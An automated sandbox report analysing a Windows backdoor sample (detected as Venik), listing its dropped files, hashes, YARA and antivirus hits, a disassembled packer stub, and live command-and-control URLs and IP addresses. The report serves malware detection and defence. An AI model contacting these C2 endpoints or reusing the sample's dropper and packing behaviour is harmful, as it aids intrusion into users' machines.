Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 11 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Software Packing | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 File Deletion | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 133 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
[Behavior graph] ID: 801466, Sample: 02hNixBIvP.exe, Startdate: 08/02/2023, Architecture: WINDOWS, Score: 100
Process chain: 02hNixBIvP.exe drops C:\Users\user\AppData\Local\Temp\ifaie.exe (PE32) and starts cmd.exe; cmd.exe starts PING.EXE (127.0.0.1), conhost.exe and ifaie.exe; ifaie.exe drops C:\Program Files\lhnfbdjfh\hclyc.dll and C:\Program Files\lhnfbdjfh\hcl.exe (both PE32) and starts hcl.exe; hcl.exe contacts 107.163.56.110:18530 and 107.163.56.231:18530 (TAKE2US, United States) and 4 other IPs or domains.
Two further hcl.exe instances each start cmd.exe, which starts conhost.exe and PING.EXE.

Source | Detection | Scanner | Label
02hNixBIvP.exe | 92% | ReversingLabs | Win32.Backdoor.Venik
02hNixBIvP.exe | 78% | Virustotal |
02hNixBIvP.exe | 100% | Avira | TR/Crypt.XPACK.Gen
02hNixBIvP.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\ifaie.exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\Program Files\lhnfbdjfh\hclyc.dll | 100% | Avira | TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\ifaie.exe | 100% | Joe Sandbox ML |
C:\Program Files\lhnfbdjfh\hclyc.dll | 100% | Joe Sandbox ML |
C:\Program Files\lhnfbdjfh\hcl.exe | 0% | ReversingLabs |

Source | Detection | Scanner | Label
4.0.ifaie.exe.400000.0.unpack | 100% | Avira | ADSPY/AdSpy.Gen
0.0.02hNixBIvP.exe.400000.0.unpack | 100% | Avira | ADSPY/AdSpy.Gen
0.2.02hNixBIvP.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.2.ifaie.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
5.2.hcl.exe.10000000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Source | Detection | Scanner | Label
blogx.sina.com.cn | 0% | Virustotal |
blog.sina.com.cn | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
blogx.sina.com.cn | 202.108.0.52 | true | false |  | unknown
blog.sina.com.cn | unknown | unknown | false |  | unknown
  • Avira URL Cloud: safe
unknown
http://107.163.56.232:18963/main.phpE&hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://blog.sina.com.cn/u/5762479093#hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://blog.sina.com.c18963/main.phphcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://blog.sina.com.cn/u/5762479093i(&hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://107.163.56.232:18963/main.php_hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://107.163.56.232:18963/main.phpl4Shcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://blog.sina.com.cn/u/576247909384hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://blog.sina.com.cn/u/5762479093Mhcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://107.163.56.232:18963/main.phpC:hcl.exe, 00000005.00000002.526014230.00000000059DA000.00000004.00000010.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.525980892.00000000057BE000.00000004.00000010.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://blog.sina.com.chcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://blog.sina.com.cn/u/5762479093nihcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.469390389.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://107.163.56.232:18963/main.phphcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://107.163.56.232:18963/main.phpShcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://107.163.56.232:18963/main.phpnif&~dhcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://blog.sina.com.cn/u/5762479093Shcl.exe, 00000005.00000003.505645297.0000000002E85000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://107.163.56.110:18530/u1129.htmlIEhcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://107.163.56.232:n/u/5762479093hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
low
http://blog.sina.com.cn/u/5762479093q&Kdhcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://107.163.56.232:18963/main.php-hcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://107.163.56.232:18963/main.php.hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://107.163.56.232:18963/main.phpkhcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://blog.sina.com.cn/u/5762479093zhcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://107.163.56.231:18530//joy.asp?sid=rungnejcodyYreveFe5vteX8v2LUicbtudb8mtiWmZiZmtehcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://107.163.56.232:18963/main.phpehcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
http://107.163.56.232:18963/main.phpanifestshcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
202.108.0.52 | blogx.sina.com.cn | China | 4808 | CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | false
107.163.56.232 | unknown | United States | 20248 | TAKE2US | true
107.163.56.231 | unknown | United States | 20248 | TAKE2US | true
107.163.56.110 | unknown | United States | 20248 | TAKE2US | true
107.163.56.251 | unknown | United States | 20248 | TAKE2US | false
IP
127.0.0.1
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:801466
Start date and time:2023-02-08 11:57:33 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 11m 29s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:27
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample file name:02hNixBIvP.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@22/4@23/6
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 19.4% (good quality ratio 17.1%)
  • Quality average: 65.1%
  • Quality standard deviation: 31.7%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 16
  • Number of non-executed functions: 51
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
  • Not all processes where analyzed, report is missing behavior information
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
11:58:36 | API Interceptor | 1496x Sleep call for process: hcl.exe modified
                                                  Process:C:\Program Files\lhnfbdjfh\hcl.exe
                                                  File Type:ISO-8859 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):377
                                                  Entropy (8bit):4.220883753079589
                                                  Encrypted:false
                                                  SSDEEP:6:yFddknBIvMz/PMEaWlVIKXFooKWDrrWRaM:8dd8BTz/XlwWD/M
                                                  MD5:FD2B0548ED20D1BE1EB9A6B9666F7F17
                                                  SHA1:9B62932BDAD02E05CA8AB1153D3A9C95D42812DA
                                                  SHA-256:8A139775391E7727E79967866C696B648EE2BFBB5D2237670233EDDC06891AF5
                                                  SHA-512:FCC8CD01152256B0117FD8AFE8B7E80CCABB09056BEFA614F88060A713FFB105D9A815830971D62EDC3231563BA6C6B9D56E694D6087B7D0A0F8DB9B7DA77C92
                                                  Malicious:false
                                                  Preview:..2023-02-10 08:29..iOffset....2023-02-12 01:15..iOffset....2023-02-13 11:11..iOffset....2023-02-15 04:12..iOffset....2023-02-16 02:10..iOffset....2023-02-17 08:06..iOffset....2023-02-18 06:29..iOffset....2023-02-19 22:54..iOffset....2023-02-20 10:58..iOffset....2023-02-22 00:24..iOffset....2023-02-23 19:09..iOffset....2023-02-25 00:31..iOffset....2023-02-25 21:49..iOffset..
                                                  Process:C:\Users\user\AppData\Local\Temp\ifaie.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):61952
                                                  Entropy (8bit):6.1891584557780455
                                                  Encrypted:false
                                                  SSDEEP:768:vV+4s9C36jbgktDymekZ+bRnbSEln5IyYpamDjobj8S47:vc8ms1mibRJln5IUmDjoX07
                                                  MD5:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                  SHA1:BCC5DC3222034D3F257F1FD35889E5BE90F09B5F
                                                  SHA-256:4E15AA13A02798E924C63537E458A09415C48DAE0E7AFD5A3D25532A2AA935EE
                                                  SHA-512:85C94763698448275AD996805FD59A3A4789BEFB79BE2175E2BBFED1CE9A2D424500DCAF42FFA225C33FE7090F0FEDF6B7BED63168FEC64D112CD09559829AFE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: QdRsIGxEq1.exe, Detection: malicious, Browse
                                                  • Filename: NDA Example 2023.img, Detection: malicious, Browse
                                                  • Filename: KYC_ZE72(Dec15).html, Detection: malicious, Browse
                                                  • Filename: SecuriteInfo.com.Variant.Jaik.46772.28250.19063.dll, Detection: malicious, Browse
                                                  • Filename: SecuriteInfo.com.Variant.Jaik.46772.16628.7980.dll, Detection: malicious, Browse
                                                  • Filename: SecuriteInfo.com.Variant.Jaik.46772.13360.18168.dll, Detection: malicious, Browse
                                                  • Filename: rxOMvar9S1.html, Detection: malicious, Browse
                                                  • Filename: mhWffYIn4s.dll, Detection: malicious, Browse
                                                  • Filename: Scan_Document3751-(Nov8).img, Detection: malicious, Browse
                                                  • Filename: Document_2930#Nov10.html, Detection: malicious, Browse
                                                  • Filename: Document_8280#Nov10.html, Detection: malicious, Browse
                                                  • Filename: imguser.dll, Detection: malicious, Browse
                                                  • Filename: imgengine.dll, Detection: malicious, Browse
                                                  • Filename: Scan_Document4852-(Nov8).img, Detection: malicious, Browse
                                                  • Filename: personal_data#6509.html, Detection: malicious, Browse
                                                  • Filename: Invoice_3371_October-25.html, Detection: malicious, Browse
                                                  • Filename: Invoice_2873_October-25.html, Detection: malicious, Browse
                                                  • Filename: Invoice_5694_October-25.html, Detection: malicious, Browse
                                                  • Filename: Invoice_6546_October-25.html, Detection: malicious, Browse
                                                  • Filename: Invoice_9844_October-25.html, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...o...l...h..l..m.o.l...m..l...i..l...e...l....l...n..l.Rich.l.................PE..L...4^?..................b..........Pa............@..........................@............@.............................................hg...................0..D.......T........................... .......................lm..`....................text....a.......b.................. ..`.data................f..............@....idata...............h..............@..@.didat..............................@....rsrc...hg.......h..................@..@.reloc..D....0......................@..B................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\ifaie.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):192637
                                                  Entropy (8bit):7.653414219548302
                                                  Encrypted:false
                                                  SSDEEP:3072:OvQ/fUx411ZxIBgDIuZmKeJpj7gC/2Eys5UXQ/ARHrHVxUo++BPO1fQDfPpFvOqG:qecxGZxIBzu4KgpfL/LpiXQ/ur1SoLOp
                                                  MD5:C97302177183954E108B22356C7D2E62
                                                  SHA1:8B6D658AF931A4518D60EDD775908C5FB0A9387C
                                                  SHA-256:14370B5EDDED083B37AC7BAA9EFECCF32B61F11F1A364433530F2B28A2E3271B
                                                  SHA-512:41319709B7C756EFA22FC92C4290794DAA0FCBF1801B115284F024CDEBCEED71B1EC5D86C070FD48F3225DF49A8D97CBD9B31573C1471DB65F40DA7E1FD40B44
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: Winnti_NlaifSvc, Description: Winnti sample - file NlaifSvc.dll, Source: C:\Program Files\lhnfbdjfh\hclyc.dll, Author: Florian Roth (Nextron Systems)
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... B..N...N...N...B...N.F.....N.......N.......N.......N...@...N.m.D...N...O.^.N.m.E...N.=.H...N.m.J...N.Rich..N.........................PE..L...+Y`V...........!................k........................................0..........................................a............ ..........................d....................................................................................text............................... ..`.rdata..k5..........................@..@.data...._... ......................@....oo0................................`..`.oo1.........P......................`....reloc..d...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\02hNixBIvP.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):272305
                                                  Entropy (8bit):7.908450866149964
                                                  Encrypted:false
                                                  SSDEEP:6144:OK+/nlJyamKOrllFIFkRqqfc+MYCvNxrQWSF4:Ejy3PLIF3qU+lOxrb
                                                  MD5:A14885E3017A4DDC08143092526DFC7B
                                                  SHA1:3C2765C4AB46146505C5C435BEE7F458E8124D0E
                                                  SHA-256:B45DCC5406B03A44B6CB98709008892FF26EF2F60DC0910C3E915DD870169F58
                                                  SHA-512:001979D6B054DF77B90280DEC33295CF87C85C3CD66C4FBDB41898F272467954A1FDFB29023E0E9C9F2D5D1DD57A0A1AB1D7E76C2817C620C7C74336F935EDE6
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: CN_Honker_Webshell, Description: Sample from CN Honker Pentest Toolset - file Webshell.exe, Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Author: Florian Roth (Nextron Systems)
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]e.......................$......Rich............PE..L....\`V.............................]............@.........................................................................jh..(.......t7..........................................................................................................DINGBOY............................. ...DINGBOY............................. ............P..$..?T....~2y....%s.)...!..A.m...Q.YO.z|#.).l\.;5......./wT..U.Kv.<..g...$`}`M.x..F..u..MfQO..K.~..B....3ebtU.....:......=`S..Y.i.#.0..Id...........jmA....@S.o*.n&..s(.........K>..(..w.+!+..z...).r@......y!..\..N.R..'(i..E[..x..d..._'..g.......$.9..t6...-u.d...B.W#Hy..yUr..S...T.F.. \. .D@.`....w.0....E....5..$s.E7..{..g.:].[}...}.<.g?.C.W....o.#..Z...../.D.....C.0(...M^.... .F.I-w...V..?..0.*.......l.+X......l....A...g.......C.r..sBH.w...5.x.U.[x.ws
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.908307802122323
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.70%
                                                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:02hNixBIvP.exe
                                                  File size:272037
                                                  MD5:003f93a1f33ec617b46a87c98b19fd85
                                                  SHA1:cebe846ccb643f8f843206d52cd701b02c1708f3
                                                  SHA256:3c096962f3f447b1a0d136c730f0d979faafb01f22eddedccfc801bc167e0925
                                                  SHA512:a8572584dd73f2550184595305f60412d1170db9ef6f2109ce64bd3b05a7101982ebd29352e68b1473e4ae86b0b6e9bddfb04dcbc8b8bf5ab41df020420c7d8a
                                                  SSDEEP:6144:OK+/nlJyamKOrllFIFkRqqfc+MYCvNxrQWSFS:Ejy3PLIF3qU+lOxrl
                                                  TLSH:5744011BDBC50A3DE06F87330C0A6972BE62F64D20754F3503989958FD1AA2334EE2B4
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]e.......................$......Rich............PE..L....\`V.............................]............@........................
                                                  Icon Hash:600ceef6e49a9040
                                                  Entrypoint:0x4b5d8e
                                                  Entrypoint Section:DINGBOY
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                  DLL Characteristics:
                                                  Time Stamp:0x56605CBF [Thu Dec 3 15:16:15 2015 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:e0ce5ef0bca7a89405f5a38e31b7697b
                                                  Instruction
                                                  push ebp
                                                  push edi
                                                  push esi
                                                  push edx
                                                  push ecx
                                                  push ebx
                                                  add bx, 02EBh
                                                  jmp 00007F244C7AEE8Eh
                                                  add bx, 02EBh
                                                  jmp 00007F244C7AEE8Eh
                                                  pop eax
                                                  pop eax
                                                  pop eax
                                                  pop eax
                                                  pop eax
                                                  pop eax
                                                  pushad
                                                  call 00007F244C7AEE95h
                                                  mov ebp, dword ptr [esp]
                                                  add esp, 04h
                                                  jmp 00007F244C7AEE95h
                                                  or eax, 03EB0000h
                                                  or al, 00h
                                                  add byte ptr [ebp+00264BB5h], cl
                                                  add byte ptr [ebp+00034E9Dh], cl
                                                  add byte ptr [ebx], dh
                                                  jmp far eax
                                                  mov byte ptr [edx], al
                                                  add byte ptr [eax], al
                                                  jmp 00007F244C7AEE95h
                                                  sbb byte ptr [eax], al
                                                  add byte ptr [edx+40h], ch
                                                  push 00001000h
                                                  push 000C2000h
                                                  push 00000000h
                                                  call dword ptr [ebp+00000AF9h]
                                                  mov dword ptr [ebp+00001AF1h], eax
                                                  jmp 00007F244C7AEE95h
                                                  adc al, 00h
                                                  add bl, ch
                                                  adc al, 60h
                                                  push dword ptr [ebp+00001AF1h]
                                                  push dword ptr [edi+esi]
                                                  push dword ptr [edi+esi+04h]
                                                  call ebx
                                                  popad
                                                  add edi, 08h
                                                  cmp dword ptr [edi+esi], 00000000h
                                                  jne 00007F244C7AEE78h
                                                  lea esi, dword ptr [edi+esi+04h]
                                                  cmp dword ptr [ebp+00002362h], 01h
                                                  jne 00007F244C7AEED6h
                                                  xor edi, edi
                                                  pushad
                                                  jmp 00007F244C7AEEC1h
                                                  mov eax, dword ptr [esi]
                                                  mov ebx, dword ptr [esi+04h]
                                                  mov edx, dword ptr [esi+08h]
                                                  call 00007F244C7AF0A6h
                                                  lea ecx, dword ptr [ebp+000020B1h]
                                                  push ecx
                                                  or edx, edx
                                                  jne 00007F244C7AEE96h
                                                  push 00000020h
                                                  jmp 00007F244C7AEE94h
                                                  push 00000040h
                                                  push eax
                                                  push ebx
                                                  call dword ptr [ebp+00000B01h]
                                                  add esi, 0Ch
                                                  cmp dword ptr [esi], FFFFFFFFh
                                                  jne 00007F244C7AEE93h
                                                  inc edi
                                                  or edi, edi
                                                  je 00007F244C7AEE5Fh
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb686a          0x28          DINGBOY
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb8912          0x3774        DINGBOY
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name     Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity    File Type  Entropy            Characteristics
DINGBOY  0x1000           0x7a000       0x0       False     0                  empty      0.0                IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DINGBOY  0x7b000          0x41086       0x41086   False     0.945129779933477  data       7.909826423981474  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

DLL           Import
kernel32.dll  LoadLibraryA, GetProcAddress, VirtualAlloc, VirtualFree, VirtualProtect, GetModuleHandleA

Language of compilation system  Country where language is spoken
Chinese                         China
English                         United States
                                                  Feb 8, 2023 11:59:39.351934910 CET4972980192.168.2.3202.108.0.52
                                                  Feb 8, 2023 11:59:42.046710968 CET497306658192.168.2.3107.163.56.251
                                                  Feb 8, 2023 11:59:42.183449984 CET4972718963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:42.339701891 CET4972818963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:42.355324030 CET4972980192.168.2.3202.108.0.52
                                                  Feb 8, 2023 11:59:43.368586063 CET4973118963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:44.831480980 CET4973218963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:45.058706999 CET497306658192.168.2.3107.163.56.251
                                                  Feb 8, 2023 11:59:45.663043976 CET4973380192.168.2.3202.108.0.52
                                                  Feb 8, 2023 11:59:46.371256113 CET4973118963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:47.378340960 CET4973418963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:47.548405886 CET4973518963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:47.609127998 CET4973680192.168.2.3202.108.0.52
                                                  Feb 8, 2023 11:59:50.543436050 CET4973418963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:50.668471098 CET4973518963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:50.669002056 CET4973680192.168.2.3202.108.0.52
                                                  Feb 8, 2023 11:59:51.231091022 CET497306658192.168.2.3107.163.56.251
                                                  Feb 8, 2023 11:59:51.425841093 CET4973718963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:51.629407883 CET4973818963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:51.652141094 CET4973980192.168.2.3202.108.0.52
                                                  Feb 8, 2023 11:59:54.543766975 CET4973718963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:54.668797016 CET4973818963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:54.731400967 CET4973980192.168.2.3202.108.0.52
                                                  Feb 8, 2023 11:59:55.488677979 CET4974018963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:55.613238096 CET4974118963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:55.690136909 CET4974280192.168.2.3202.108.0.52
